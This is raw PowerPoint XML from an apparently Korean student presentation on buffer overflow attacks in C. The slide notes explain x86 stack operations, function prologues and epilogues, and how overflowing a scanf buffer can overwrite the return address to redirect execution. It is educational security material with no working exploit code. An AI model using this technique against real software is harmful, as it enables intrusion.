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  <p:sldMasterId id="2147483684" r:id="rId2"/>
    <p:sldMasterId id="2147483685" r:id="rId3"/>
    <p:sldMasterId id="2147483686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9" r:id="rId6"/>
    <p:sldId id="257" r:id="rId7"/>
    <p:sldId id="266" r:id="rId8"/>
    <p:sldId id="268" r:id="rId9"/>
    <p:sldId id="277" r:id="rId10"/>
    <p:sldId id="269" r:id="rId11"/>
    <p:sldId id="278" r:id="rId12"/>
    <p:sldId id="284" r:id="rId13"/>
    <p:sldId id="285" r:id="rId14"/>
    <p:sldId id="286" r:id="rId15"/>
    <p:sldId id="287" r:id="rId16"/>
    <p:sldId id="288" r:id="rId17"/>
    <p:sldId id="271" r:id="rId18"/>
    <p:sldId id="293" r:id="rId19"/>
    <p:sldId id="280" r:id="rId20"/>
    <p:sldId id="289" r:id="rId21"/>
    <p:sldId id="273" r:id="rId22"/>
    <p:sldId id="274" r:id="rId23"/>
    <p:sldId id="290" r:id="rId24"/>
    <p:sldId id="291" r:id="rId25"/>
    <p:sldId id="275" r:id="rId26"/>
    <p:sldId id="295" r:id="rId27"/>
    <p:sldId id="294" r:id="rId28"/>
    <p:sldId id="296" r:id="rId29"/>
    <p:sldId id="292" r:id="rId30"/>
    <p:sldId id="281" r:id="rId31"/>
    <p:sldId id="282" r:id="rId32"/>
    <p:sldId id="283" r:id="rId33"/>
    <p:sldId id="276" r:id="rId34"/>
  </p:sldIdLst>
  <p:sldSz cx="12192000" cy="6858000"/>
  <p:notesSz cx="9144000" cy="6858000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="나눔스퀘어" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
      <p:regular r:id="rId37"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="나눔스퀘어 Bold" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
      <p:bold r:id="rId38"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="나눔스퀘어 ExtraBold" panose="020B0600000101010101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함초롬돋움" panose="020B0604000101010101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  <p15:guide id="3" pos="-3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인서" initials="황" lastIdx="2" clrIdx="0">
    <p:extLst>
      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="황인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81850" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="93" d="100"/>
          <a:sy n="93" d="100"/>
        </p:scale>
        <p:origin x="924" y="96"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2158"/>
        <p:guide pos="3838"/>
        <p:guide pos="-3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4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5D23535-CF18-473F-8142-07227A8BCF11}" type="datetime1">
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:pPr lvl="0">
                <a:defRPr lang="ko-KR" altLang="en-US"/>
              </a:pPr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44CA260-A431-4C7C-BE37-9568EA670A3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70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발표를 시작하기 전에</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>오늘 발표할 내용이 상당히 난해할 수 있습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. ppt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>에는 슬라이드 노트를 적어놨고 혹시몰라 구글 드라이브에 대본을 올려두었으니 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발표 중간에 놓치셨거나 이해가 안되는 부분은 참고해 주시기 바랍니다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BufferOverflow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>공격을 이용한 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>언어 함수의 취약점 탐구 및 대안 제시</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>프로젝트 결과 발표 시작하겠습니다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발표 목표는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>BOF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>공격의 원리를 메모리</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>프로세스</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>어셈블리 구조를 통해 이해하고 나아가 직접 공격을 실습해 봄으로써 개념을 확실히 하는 것입니다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또한 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>BOF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>공격을 막는 기법에 대해 소개해 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1AB63B-2015-4CFD-BEE8-B802062C9C8F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45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pop %eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>를 실행하면 스택 상위에 있던 값을 빼내어 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>에 저장합니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>도 그만큼 증가하게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2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 $0x8, %esp </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>를 실행하면 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>만큼 뺀다는 뜻입니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>일반적으로는 그것이 전부입니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>그런데 이것의 의미를 메모리 구조와 관련지어 살펴보면</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> stack pointer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>바이트만큼 감소시킨다는 의미가 되고 스택에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>바이트만큼의 빈 공간이 생기도록 합니다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이 명령어는 스택을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>바이트 확장했다는 의미로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60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call</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>은 함수를 호출하는 명령어 입니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>이 명령어는 굉장히 중요합니다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call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>명령어와 함께 함수를 호출하는 과정을 살펴보도록 하겠습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>함수를 호출하는 코드를 짜봤습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>이 코드를 어셈블리 코드로 바꿨을 때 함수를 호출하는 부분만 뽑아봤습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>이때 주소 값은 숫자형이고 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>0x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>가 붙으면 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>진수임을 의미합니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>주의하시기 바랍니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>언어는 함수를 호출 할 때 함수의 인자를 거꾸로 스택에 넣어줍니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>보시면 함수의 두 번째 인자인 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>을 먼저 주는 데요 그 이유는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>스택구조이기</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> 때문에 꺼낼 때는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>이 먼저 나오기 때문입니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>그 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>return address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>라는 것을 넣어줍니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>이것은 호출한 함수가 종료된 후 다시 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>main </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>함수로 돌아오기 위해 함수를 호출한 지점의 다음 명령어의 주소를 스택에 넣어주는 것입니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>명령어를 마치고 난 후에는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>EIP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>함수의 시작 주소를 가리키고 그 함수를 실행하게 될 것입니다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7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r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> 함수의 내용중 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>플롤로그와</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> 에필로그 부분만 뽑아봤습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>함수를 포함해서</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>함수를 호출하게 되면 제일 먼저 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>를 스택에 저장합니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>는 함수의 시작 주소였으니</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>함수를 호출한 함수의 시작주소를 넣어주는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 예에서는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>함수 시작 시 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>함수의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>bp(base pointer)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>를 스택에 넣어주고 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>를 현재 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" err="1"/>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>의 값으로 바꿔줍니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>즉 현재 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" err="1"/>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>의 값을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>의 시작주소로 삼는 것입니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>이것을 함수의 프롤로그 과정이라고 합니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>이 과정은 이전 함수의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>base pointer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>를 보존하기 위해서 하는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leave</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>를 하면 함수의 에필로그 작업이 시작됩니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>이것은 프롤로그를 거꾸로 해주면 됩니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>제가</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>함수의 내용을 생략했지만 실제로는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" err="1"/>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>의 값이 마구 바뀌면서 함수의 내용이 실행될 것입니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>그러다 함수가 종료가 될 때면 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" err="1"/>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>의 시작주소를 넣은 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>값을 넣어주고 스택 상위에 있던 값을 빼서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>에 넣어줍니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>이것은 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>main </a:t>
            </a:r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 err="1"/>
              <a:t>시작주소였습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>이렇게 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>main </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>함수의 시작주소를 다시 획득했습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>그다음 명령어 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>ret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>는 스택의 상위에 있는 값을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>EIP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>에 넣어줍니다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return address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>pop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>EIP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>넣어줌으로써</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> 함수를 호출했던 지점의 다음 명령어를 이어서 수행할 수 있는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굳이 기호로 나타내면 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>pop %eip </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>라고 할 수 있겠지만 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>EIP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>는 직접 수정할 수 없기 때문에</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>부적절한 명령어라고 할 수 있겠습니다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4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어셈블리 명령어를 메모리와 레지스터의 변화를 통해 알아봤고</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> 대략적인 프로세스의 실행 흐름을 보았습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>그렇다면 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>BufferOverflow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>란 무엇일까요</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>Buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>는 시스템이 연산작업을 하는 데 있어 필요한 데이터를 일시적으로 메모리에 저장해 놓은 공간을 말합니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>전 슬라이드에서 사용했던 스택을 가져왔습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>호출된 함수가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>scanf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>라고 가정해 봅시다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. scanf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>는 버퍼를 쓰는 대표적은 함수입니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>scanf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>가 호출되고 프롤로그를 마치면</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>사용자의 입력을 받기 위해 버퍼를 만들어 두게 될 것입니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>그리고 사용자의 입력을 버퍼에 일시적으로 저장해 둡니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>마련된 버퍼만큼 입력을 해주면 문제가 없습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>하지만 그 이상 입력하게 되면 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>나 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>return address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>까지 덮어씌워 버릴 수 있습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>이 현상이 바로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>BufferOverflow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en-US" altLang="ko-KR"/>
              <a:t>BOF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>공격은 이것을 악용해서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>return address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>에 실행시키고자 하는 코드의 주소를 넣는 것입니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>그러면 함수의 에필로그 과정을 통해 간접적으로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>EIP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>를 수정할 수 있고</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
